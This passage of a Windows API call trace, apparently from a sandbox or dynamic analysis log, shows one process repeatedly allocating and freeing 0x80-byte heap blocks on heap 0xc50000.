| out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0031.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71950 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0031.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0031.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.799] HeapFree (in: 